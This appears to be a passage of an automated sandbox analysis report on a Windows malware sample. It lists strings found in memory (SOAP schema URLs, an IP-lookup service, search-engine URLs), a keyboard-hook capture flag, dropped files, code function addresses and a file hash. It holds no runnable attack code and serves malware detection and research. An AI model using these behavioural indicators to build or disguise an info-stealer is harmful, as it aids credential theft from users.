                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002AAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002AAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002AAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002AAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002AAA000.00000004.00000800.00020000.00000000.sdmp, in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002AAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002AAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8ResponseD
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002AAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9ResponseD
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exeString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: in.exe, 0000000B.00000002.2139768224.000000000295C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ipKSELSystem.Windows.FormsECT
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                        Source: jjjUC5ggb2nQMb1B6SvBkwmT.exeString found in binary or memory: https://sectigo.com/CPS0
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003AC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_00408DBB SetWindowsHookExW 00000002,Function_00008D8D,00000000,000000000_2_00408DBB
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp30F7.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp3107.tmpJump to dropped file

                        System Summary

                        barindex
                        Source: file.bin.0.drZip Entry: encrypted
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_004596AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,5_2_004596AC
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_00405BFC0_2_00405BFC
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_0040B0E00_2_0040B0E0
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_0040B0E40_2_0040B0E4
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_004199730_2_00419973
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_0040A9000_2_0040A900
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_0040A2700_2_0040A270
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_0040AC200_2_0040AC20
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_00409C200_2_00409C20
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_0040D4800_2_0040D480
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_0040ED000_2_0040ED00
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_00409DD00_2_00409DD0
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_004196010_2_00419601
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_004196DB0_2_004196DB
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_00418F400_2_00418F40
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0047F13E5_2_0047F13E
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_004754585_2_00475458
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_004724C05_2_004724C0
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_004747AC5_2_004747AC
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_004988175_2_00498817
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00460DCC5_2_00460DCC
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0045B1145_2_0045B114
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0045F1B45_2_0045F1B4
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0046C2785_2_0046C278
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_004825785_2_00482578
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_004935285_2_00493528
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0048066E5_2_0048066E
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0047D66C5_2_0047D66C
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0046D8585_2_0046D858
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0047694C5_2_0047694C
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_004879DC5_2_004879DC
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_004949A55_2_004949A5
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_004899B85_2_004899B8
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0048FA0C5_2_0048FA0C
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0049DA305_2_0049DA30
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00467C685_2_00467C68
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0049DC115_2_0049DC11
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00468CA85_2_00468CA8
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0049DD005_2_0049DD00
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00476E085_2_00476E08
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0046AF585_2_0046AF58
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_00458F185_2_00458F18
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_00E5122811_2_00E51228
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_00E5121711_2_00E51217
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_00E50D6811_2_00E50D68
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_00E50D7811_2_00E50D78
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_027A66C811_2_027A66C8
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_027A77E511_2_027A77E5
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_027A9F8811_2_027A9F88
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_027A903F11_2_027A903F
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_027A042011_2_027A0420
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_04E74E7811_2_04E74E78
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_04E748E811_2_04E748E8
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_04E7C0A311_2_04E7C0A3
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_04E74E6811_2_04E74E68
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_04E748DB11_2_04E748DB
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_04E758A811_2_04E758A8
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_04E7828711_2_04E78287
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_04E7432911_2_04E74329
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_04E7433011_2_04E74330
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_0510000711_2_05100007
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_0510004011_2_05100040
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_05117C6811_2_05117C68
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_08A9F93811_2_08A9F938
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_08A9894A11_2_08A9894A
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_08A9895811_2_08A98958
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_08A9BB8111_2_08A9BB81
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_08A9BB9011_2_08A9BB90
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_08A9632811_2_08A96328
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_08A9633811_2_08A96338
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_08A9E30811_2_08A9E308
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_08A96FE811_2_08A96FE8
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_08A96FD811_2_08A96FD8
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_08A93F6011_2_08A93F60
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_08A9CF7011_2_08A9CF70
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_08A93F5011_2_08A93F50
                        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\main\7z.dll 34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
